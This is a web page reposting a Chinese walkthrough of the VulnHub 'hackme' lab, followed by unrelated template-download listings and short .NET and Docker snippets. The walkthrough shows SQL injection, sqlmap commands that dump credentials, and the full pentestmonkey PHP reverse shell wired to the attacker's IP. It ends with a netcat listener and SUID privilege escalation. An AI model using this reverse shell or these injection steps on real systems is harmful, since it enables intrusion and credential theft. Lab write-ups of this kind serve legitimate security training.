前端技术
HTML
CSS
Javascript
前端框架和UI库
VUE
ReactJS
AngularJS
JQuery
NodeJS
JSON
Element-UI
Bootstrap
Material UI
服务端和客户端
Java
Python
PHP
Golang
Scala
Kotlin
Groovy
Ruby
Lua
.net
c#
c++
后端WEB和工程框架
SpringBoot
SpringCloud
Struts2
MyBatis
Hibernate
Tornado
Beego
Go-Spring
Go Gin
Go Iris
Dubbo
HessianRPC
Maven
Gradle
数据库
MySQL
Oracle
Mongo
中间件与web容器
Redis
MemCache
Etcd
Cassandra
Kafka
RabbitMQ
RocketMQ
ActiveMQ
Nacos
Consul
Tomcat
Nginx
Netty
大数据技术
Hive
Impala
ClickHouse
DorisDB
Greenplum
PostgreSQL
HBase
Kylin
Hadoop
Apache Pig
ZooKeeper
SeaTunnel
Sqoop
Datax
Flink
Spark
Mahout
数据搜索与日志
ElasticSearch
Apache Lucene
Apache Solr
Kibana
Logstash
数据可视化与OLAP
Apache Atlas
Superset
Saiku
Tesseract
系统与容器
Linux
Shell
Docker
Kubernetes
[开源内容管理系统 Open-source...]的搜索结果
这里是文章列表。热门标签的颜色随机变换,标签颜色没有特殊含义。
点击某个标签可搜索标签相关的文章。
点击某个标签可搜索标签相关的文章。
转载文章
本篇文章为转载内容。原文链接:https://blog.csdn.net/Perpetual_Blue/article/details/124200651。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-1,330/ Description ‘hackme’ is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic real life environment. ‘hackme’ uses DHCP and in the possible event that the mysqld shuts down on its own (very rare cases), attempt to force restart the machine and it should be working fine subsequently. This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.149 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 二、实战 2.1网络扫描 2.1.1 启动靶机和Kali后进行扫描 方法一、arp-scan -I eth0 -l (指定网卡扫) arp-scan -I eth0 -l 方法二、masscan 扫描的网段 -p 扫描端口号 masscan 192.168.184.0/24 -p 80,22 方法三、netdiscover -i 网卡-r 网段 netdiscover -i eth0 -r 192.168.184.0/24 方法四、等你们补充 2.1.2 查看靶机开放的端口 使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口 可以发现有 2 个端口开放,22 和 80 2.1.3 尝试访问靶机网页 2.2枚举漏洞 22 端口分析 一般只能暴力破解,暂时没有合适的字典 80 端口分析 访问网站, 发现是一个登陆页面 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Nm2jCq05-1650016495541)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110170424128.png)] 成功登录后 尝试手工注入:x' or 1=1 成功返回所有信息,说明存在SQL注入 2.3漏洞利用 2.3.1 sqlmap 利用注入漏洞 使用 burp 抓查询数据包 POST /welcome.php HTTP/1.1Host: 192.168.184.149Content-Length: 23Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://192.168.184.149Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.184.149/welcome.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=jub1jihglt85brngo5imqsifb3Connection: closesearch=x 将数据包保存为文件 hackme1.txt 使用 sqlmap 跑一下测试漏洞并获取数据库名: 🚀 python sqlmap.py -r hackme1.txt --dbs --batch [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DjhXfuV9-1650016495544)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110171527015.png)] 数据库除了基础数据库有webapphacking 接下来咱们获取一下表名 🚀 python sqlmap.py -r hackme1.txt --batch -D webapphacking --tables [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1mzxiwhu-1650016495544)(C:\Users\zhang\AppData\Roaming\Typora\typora-user-images\image-20220110172336353.png)] 可以得到两个表books和users 咱们先获取一下users表的信息 🚀 python sqlmap.py -r hackme1.txt --batch -D webapphacking -T users --dump --batch 可以看到有一个superadmin,超级管理员,看起来像一个md5 扩展 在线解密md5网站 国内MD5解密: http://t007.cn/ https://cmd5.la/ https://cmd5.com/ https://pmd5.com/ http://ttmd5.com/ https://md5.navisec.it/ http://md5.tellyou.top/ https://www.somd5.com/ http://www.chamd5.org/ 国外MD5解密: https://www.md5tr.com/ http://md5.my-addr.com/ https://md5.gromweb.com/ https://www.md5decrypt.org/ https://md5decrypt.net/en/ https://md5hashing.net/hash/md5/ https://hashes.com/en/decrypt/hash https://www.whatsmyip.org/hash-lookup/ https://www.md5online.org/md5-decrypt.html https://md5-passwort.de/md5-passwort-suchen 解出来密码是:Uncrackable 登录上去,发现有上传功能 2.3.2 文件上传漏洞 getshell 将 kali 自带的 php-reverse-shell.php 复制一份到 查看文件内容,并修改IP地址 <?php// php-reverse-shell - A Reverse Shell implementation in PHP// Copyright (C) 2007 pentestmonkey@pentestmonkey.net//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. The author accepts no liability// for damage caused by this tool. If these terms are not acceptable to you, then// do not use this tool.//// In all other respects the GPL version 2 applies://// This program is free software; you can redistribute it and/or modify// it under the terms of the GNU General Public License version 2 as// published by the Free Software Foundation.//// This program is distributed in the hope that it will be useful,// but WITHOUT ANY WARRANTY; without even the implied warranty of// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the// GNU General Public License for more details.//// You should have received a copy of the GNU General Public License along// with this program; if not, write to the Free Software Foundation, Inc.,// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. If these terms are not acceptable to// you, then do not use this tool.//// You are encouraged to send comments, improvements or suggestions to// me at pentestmonkey@pentestmonkey.net//// Description// -----------// This script will make an outbound TCP connection to a hardcoded IP and port.// The recipient will be given a shell running as the current user (apache normally).//// Limitations// -----------// proc_open and stream_set_blocking require PHP version 4.3+, or 5+// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.//// Usage// -----// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.set_time_limit (0);$VERSION = "1.0";$ip = '192.168.184.128'; // CHANGE THIS$port = 6666; // CHANGE THIS$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/sh -i';$daemon = 0;$debug = 0;//// Daemonise ourself if possible to avoid zombies later//// pcntl_fork is hardly ever available, but will allow us to daemonise// our php process and avoid zombies. Worth a try...if (function_exists('pcntl_fork')) {// Fork and have the parent process exit$pid = pcntl_fork();if ($pid == -1) {printit("ERROR: Can't fork");exit(1);}if ($pid) {exit(0); // Parent exits}// Make the current process a session leader// Will only succeed if we forkedif (posix_setsid() == -1) {printit("Error: Can't setsid()");exit(1);}$daemon = 1;} else {printit("WARNING: Failed to daemonise. This is quite common and not fatal.");}// Change to a safe directorychdir("/");// Remove any umask we inheritedumask(0);//// Do the reverse shell...//// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {printit("$errstr ($errno)");exit(1);}// Spawn shell process$descriptorspec = array(0 => array("pipe", "r"), // stdin is a pipe that the child will read from1 => array("pipe", "w"), // stdout is a pipe that the child will write to2 => array("pipe", "w") // stderr is a pipe that the child will write to);$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);}// Set everything to non-blocking// Reason: Occsionally reads will block, even though stream_select tells us they won'tstream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {// Check for end of TCP connectionif (feof($sock)) {printit("ERROR: Shell connection terminated");break;}// Check for end of STDOUTif (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}// Wait until a command is end down $sock, or some// command output is available on STDOUT or STDERR$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);// If we can read from the TCP socket, send// data to process's STDINif (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}// If we can read from the process's STDOUT// send data down tcp connectionif (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}// If we can read from the process's STDERR// send data down tcp connectionif (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);} }fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);// Like print, but does nothing if we've daemonised ourself// (I can't figure out how to redirect STDOUT like a proper daemon)function printit ($string) {if (!$daemon) {print "$string\n";} }?> [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RhgS5l2a-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173559344.png)] 上传该文件 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CKEldpll-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173801442.png)] 在 kali 监听:nc -lvp 6666 访问后门文件:http://192.168.184.149/php-reverse-shell.php 不成功 尝试加上传文件夹:http://192.168.184.149/uploads/php-reverse-shell.php 成功访问 使用 python 切换为 bash:python3 -c 'import pty; pty.spawn("/bin/bash")' 2.4权限提升 2.4.1 SUID 提权 sudo -l不顶用了,换个方法 查询 suid 权限程序: find / -perm -u=s -type f 2>/dev/null www-data@hackme:/$ find / -perm -u=s -type f 2>/dev/nullfind / -perm -u=s -type f 2>/dev/null/snap/core20/1270/usr/bin/chfn/snap/core20/1270/usr/bin/chsh/snap/core20/1270/usr/bin/gpasswd/snap/core20/1270/usr/bin/mount/snap/core20/1270/usr/bin/newgrp/snap/core20/1270/usr/bin/passwd/snap/core20/1270/usr/bin/su/snap/core20/1270/usr/bin/sudo/snap/core20/1270/usr/bin/umount/snap/core20/1270/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core20/1270/usr/lib/openssh/ssh-keysign/snap/core/6531/bin/mount/snap/core/6531/bin/ping/snap/core/6531/bin/ping6/snap/core/6531/bin/su/snap/core/6531/bin/umount/snap/core/6531/usr/bin/chfn/snap/core/6531/usr/bin/chsh/snap/core/6531/usr/bin/gpasswd/snap/core/6531/usr/bin/newgrp/snap/core/6531/usr/bin/passwd/snap/core/6531/usr/bin/sudo/snap/core/6531/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/6531/usr/lib/openssh/ssh-keysign/snap/core/6531/usr/lib/snapd/snap-confine/snap/core/6531/usr/sbin/pppd/snap/core/5662/bin/mount/snap/core/5662/bin/ping/snap/core/5662/bin/ping6/snap/core/5662/bin/su/snap/core/5662/bin/umount/snap/core/5662/usr/bin/chfn/snap/core/5662/usr/bin/chsh/snap/core/5662/usr/bin/gpasswd/snap/core/5662/usr/bin/newgrp/snap/core/5662/usr/bin/passwd/snap/core/5662/usr/bin/sudo/snap/core/5662/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/5662/usr/lib/openssh/ssh-keysign/snap/core/5662/usr/lib/snapd/snap-confine/snap/core/5662/usr/sbin/pppd/snap/core/11993/bin/mount/snap/core/11993/bin/ping/snap/core/11993/bin/ping6/snap/core/11993/bin/su/snap/core/11993/bin/umount/snap/core/11993/usr/bin/chfn/snap/core/11993/usr/bin/chsh/snap/core/11993/usr/bin/gpasswd/snap/core/11993/usr/bin/newgrp/snap/core/11993/usr/bin/passwd/snap/core/11993/usr/bin/sudo/snap/core/11993/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/11993/usr/lib/openssh/ssh-keysign/snap/core/11993/usr/lib/snapd/snap-confine/snap/core/11993/usr/sbin/pppd/usr/lib/eject/dmcrypt-get-device/usr/lib/openssh/ssh-keysign/usr/lib/snapd/snap-confine/usr/lib/policykit-1/polkit-agent-helper-1/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/bin/pkexec/usr/bin/traceroute6.iputils/usr/bin/passwd/usr/bin/chsh/usr/bin/chfn/usr/bin/gpasswd/usr/bin/at/usr/bin/newgrp/usr/bin/sudo/home/legacy/touchmenot/bin/mount/bin/umount/bin/ping/bin/ntfs-3g/bin/su/bin/fusermount 发现一个可疑文件/home/legacy/touchmenot 在 https://gtfobins.github.io/网站上查询:touchmenot 没找到 尝试运行程序:发现直接提权成功 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qcpXI6zZ-1650016495551)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110174530827.png)] 找半天没找到flag的文件 what?就这? 总结 本节使用的工具和漏洞比较基础,涉及 SQL 注入漏洞和文件上传漏洞 sql 注入工具:sqlmap 抓包工具:burpsuite Webshell 后门:kali 内置后门 Suid 提权:touchmenot 提权 本篇文章为转载内容。原文链接:https://blog.csdn.net/Perpetual_Blue/article/details/124200651。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-01-02 12:50:54
497
转载
建站模板下载
...tstrap博客后台管理系统网站模板是一款基于Bootstrap框架构建的高效、响应式后台管理界面。专为博客和内容管理系统设计,具备文章管理、用户管理等功能模块,适用于各类网站后台管理场景。该模板采用清晰的布局与直观的操作界面,方便用户进行内容编辑、系统配置等操作,实现对网站的全方位、便捷化管理。 点我下载 文件大小:5.06 MB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-01-08 15:58:46
52
本站
建站模板下载
...领域的企业打造的前端内容管理系统模板。它集成了智能科技元素,适用于展示摄像头产品、安防解决方案及各类科技成果。用户可便捷下载并快速搭建具有专业感的企业官网,实现高效的内容管理与信息发布。该模板设计紧跟科技潮流,充分展现企业在安防监控领域的专业实力与领先地位。 点我下载 文件大小:18.69 MB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-10-18 20:27:44
207
本站
建站模板下载
...快递、货运公司及仓储管理业务设计的前端内容管理系统模板。它集成了货物运输、订单追踪等功能模块,提供全面的物流系统解决方案。用户可通过下载并应用此模板快速构建专业且高效的物流业务网站,展现企业形象与服务,实现信息数字化管理与交互,提升客户体验和业务效率。 点我下载 文件大小:15.79 MB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-07-08 14:56:56
295
本站
建站模板下载
...站构建,方便通过前端内容管理系统进行便捷的内容更新与管理。 点我下载 文件大小:13.98 MB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-12-28 10:41:41
73
本站
建站模板下载
...协会类企业设计的前端内容管理系统(CMS)模板,提供新闻资讯发布、信息公告展示等功能模块。适用于搭建资讯门户型网站,具有高度定制化和易于管理的特点,其界面友好、响应式布局能完美兼容多种主流浏览器,便于政府及协会及时传递政策动态与行业信息,同时满足企业展示商贸活动与成果的需求。 点我下载 文件大小:10.43 MB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-01-01 12:45:29
81
本站
建站模板下载
...S模板,它拥有强大的内容管理系统支持,便于企业便捷管理产品信息与网站内容,实现全方位的企业形象展示和产品推广,助力提升线上营销效率与用户体验。 点我下载 文件大小:13.89 MB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-08-12 09:26:13
95
本站
建站模板下载
...机构的企业级网站前端内容管理系统模板,提供下载服务。设计上兼顾了健身房和全民运动的特色,实现多设备自适应布局,方便用户在不同终端浏览。模板内含丰富的页面结构与组件,可展示课程信息、场馆设施、活动公告等内容,助力企业快速构建专业且具有高度扩展性的健身类网站。 点我下载 文件大小:15.69 MB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-12-05 10:20:19
46
本站
建站模板下载
...会教育机构设计的前端内容管理系统模板,适用于发布课程信息、展示辅导班详情和推广培训服务。模板具备高度定制性,采用响应式布局,完美适配各类终端设备,方便用户随时随地访问与报名。内置丰富组件与页面结构,便于搭建专业且功能全面的教育类网站,提升品牌形象与在线招生效果。 点我下载 文件大小:17.65 MB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-09-17 11:48:50
99
本站
建站模板下载
...企业设计的高品质前端内容管理系统模板。它以绿色环保为主题,适用于各类体育运动如足球培训班的网站搭建。模板提供了丰富的页面布局和组件,便于展示课程信息、教练团队、活动公告等内容,同时支持便捷的内容管理和更新。其强大的响应式设计确保在不同设备上均能提供优质的用户体验,是打造专业且富有活力的体育教育培训类网站的理想选择。 点我下载 文件大小:16.91 MB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-09-28 16:29:01
84
本站
建站模板下载
...秀的浏览体验。其前端内容管理系统(CMS)便捷易用,支持一键更新产品信息、种植动态等多类型内容,充分展现企业的品牌形象与产品特色,助力提升线上营销效果及用户体验。 点我下载 文件大小:14.06 MB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-07-04 11:17:25
62
本站
建站模板下载
...端CMS模板专为资产管理、信贷、投资理财和风险管理行业打造,采用HTML5技术实现自适应布局,适用于各类屏幕尺寸。模板设计兼顾专业与用户体验,适配借贷平台及金融投资企业的官网需求,提供便捷的前端内容管理系统功能,方便用户下载后快速搭建并管理网站内容,实现企业信息展示、产品推广及客户服务等功能的一体化解决方案。 点我下载 文件大小:13.44 MB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-08-02 21:14:22
316
本站
JQuery插件下载
...环境下轻松处理富文本内容。通过集成Notebook.js到网页项目中,开发者可以快速构建出具备高级文本编辑能力的组件,如字体样式调整、文本颜色变化、添加链接、插入图片等功能。其亮点在于用户直接选择网页中的文本时,会自动弹出相应的编辑选项菜单,用户只需点击相应选项,即可实时看到文本效果的变化,大大提升了内容创作和编辑的便捷性与效率。此插件易于安装和配置,只需将FontAwesomeCSS、jQuery库以及Notebook.js自身脚本引入到页面头部,然后简单调用API就能在指定DOM元素上创建一个功能齐全的富文本编辑器。这一特性使得Notebook.js成为许多web开发人员青睐的选择,尤其适用于博客系统、内容管理系统及各类需要用户输入格式化文本的场景。 点我下载 文件大小:45.92 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-03-26 13:54:27
101
本站
JQuery插件下载
...变化,显著增强了表格内容的可扫描性,使用户能够快速定位和区分不同的行记录。此外,响应式设计使得在窄屏或小屏幕设备上时,表格可以智能地调整列宽和布局,保持最佳的视觉效果和操作便捷性。总之,这款插件是网页开发者优化数据展示、增强网站专业感与用户友好度的理想工具,无论是企业报表、数据分析还是内容管理系统中复杂数据的呈现,都能发挥出色的表现力和实用性。 点我下载 文件大小:54.65 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-06-23 23:25:48
48
本站
JQuery插件下载
...s囊括了创建和格式化内容所需的所有基本工具,包括但不限于文本样式(如粗体、斜体、下划线)、段落格式、列表、链接、图片插入等功能。更重要的是,它赋予开发者极高的灵活性与定制空间,通过丰富的API接口和配置参数,开发者可以根据实际需求自定义编辑器的行为和外观,甚至可以轻松扩展以实现诸如表格编辑等高级功能。得益于其模块化的设计,Quill.js易于集成到现有的Web应用程序中,并且具有良好的性能表现和较小的体积,从而成为开发者构建交互式内容创作界面时的理想选择。无论是简单的博客文章撰写还是复杂的内容管理系统,Quill.js都能够提供稳定而高效的富文本编辑解决方案。 点我下载 文件大小:205.26 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-03-21 12:10:58
108
本站
HTML
...stmod但没改文章内容,会存在概率性被搜索引擎认为是作弊的 被索引的文章,不要删除,否则搜索引擎会认为站点不稳定 最后,sitemap.xml提交只是第一步,更多的还是应该注重站点的质量建设、外链维护、用户体验的提升
2024-01-26 18:24:34
497
admin-tim
JQuery插件下载
...源进行个性化排序。-内容管理系统的文章或帖子列表,实现用户友好的编辑和组织方式。-游戏或互动式应用中,用户可以自由调整游戏元素的位置,增加游戏的沉浸感和参与度。安装与集成:1.引入依赖:首先确保你的项目中包含了jQuery库。2.引入插件:从可靠的源下载DDSort.js文件,并将其添加到项目中。3.初始化插件:在文档加载完毕后,调用DDDsort插件,指定需要排序的元素及目标区域等参数。javascript$('.your-element-selector').DDSort({target:'.target-selector',//其他配置选项});DDSort通过其直观的接口和强大的功能,为开发者提供了一种高效、灵活的解决方案,旨在简化页面元素的动态排序过程,提升用户体验,同时确保兼容旧版浏览器的需求。无论是用于商业网站、教育平台还是个人项目,DDSort都能成为实现高效、交互性强的排序功能的理想选择。 点我下载 文件大小:44.43 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2024-08-22 21:22:28
85
本站
.net
...件流 byte[] content = Encoding.UTF8.GetBytes("Hello, File Stream!"); fs.Write(content, 0, content.Length); Console.WriteLine($"Data written to file: {filePath}"); } } 上述代码首先定义了文件路径和访问模式,然后创建了一个FileStream对象。这里使用FileMode.Create表示如果文件不存在则创建,存在则覆盖原有内容。接着,我们将字符串转换为字节数组并写入文件流。 3. 文件流的读取操作 读取文件流的操作同样直观易懂。以下是一个读取文本文件并将内容打印到控制台的例子: csharp static void ReadFileStream(string filePath) { using FileStream fs = new FileStream(filePath, FileMode.Open); using StreamReader reader = new StreamReader(fs, Encoding.UTF8); // 读取文件内容 string line; while ((line = reader.ReadLine()) != null) { Console.WriteLine(line); // 这里可以添加其他处理逻辑,例如解析或分析文件内容 } } 在这个示例中,我们打开了一个已存在的文件流,并通过StreamReader逐行读取其中的内容。这在处理配置文件、日志文件等场景非常常见。 4. 文件流的高级应用与注意事项 文件流在处理大文件时尤为高效,因为它允许我们按块或按需读取或写入数据,而非一次性加载整个文件。但同时,也需要注意以下几个关键点: - 资源管理:务必使用using语句确保流在使用完毕后能及时关闭,避免资源泄漏。 - 异常处理:在文件流操作中,可能会遇到各种IO错误,如文件不存在、权限不足等,因此要合理捕获和处理这些异常。 - 缓冲区大小的选择:根据实际情况调整缓冲区大小,可以显著提高读写效率。 综上所述,C中的文件流处理功能强大而灵活,无论是简单的文本文件操作还是复杂的大数据处理,都能提供稳定且高效的解决方案。在实际操作中,我们得根据业务的具体需要,真正吃透文件流的各种功能特性,并且能够灵活运用到飞起,这样才能让文件流的威力发挥到极致。
2023-05-01 08:51:54
468
岁月静好
Docker
... Docker是一种开源的应用容器引擎,它通过将应用程序及其依赖打包到可移植的容器中,实现了软件的标准化部署和运行。在本文语境下,用户使用Docker来拉取、管理和运行官方提供的镜像,但在国内网络环境下遇到了访问不稳定的问题。 镜像(Image) , 在Docker环境下,镜像是一个轻量级、可执行的独立软件包,包含运行某个软件所需的所有内容,包括代码、运行时环境、系统工具库等。当用户执行docker pull命令拉取镜像时,实际上是下载这个包含了应用运行环境及应用本身的文件集合。 国内镜像源 , 由于网络原因,直接从国外的Docker Hub获取镜像可能会遇到速度慢或无法连接的问题。国内镜像源是针对这一问题提供的一种解决方案,它通常是托管在国内服务器上的Docker Registry服务,用于同步或缓存Docker Hub上的官方镜像。用户通过配置Docker以使用这些国内镜像源,可以提高镜像拉取的速度和稳定性。 daemon.json , 在Docker中,daemon.json是一个重要的配置文件,用于存储Docker守护进程的全局配置选项。当需要更改Docker的默认行为,如添加镜像加速器(registry mirror)、设置日志级别等时,就需要编辑这个文件。在本文中,作者通过修改daemon.json文件中的\ registry-mirrors\ 字段,指定使用国内的镜像源。 systemctl , systemctl是Systemd系统和服务管理器的一部分,用于管理系统级别的服务,例如启动、停止、重启服务以及查看服务状态等。在本文中,作者使用systemctl命令来重新加载Docker服务的配置并重启Docker服务,以便新的镜像源配置生效。
2024-03-06 16:10:51
401
程序媛
转载文章
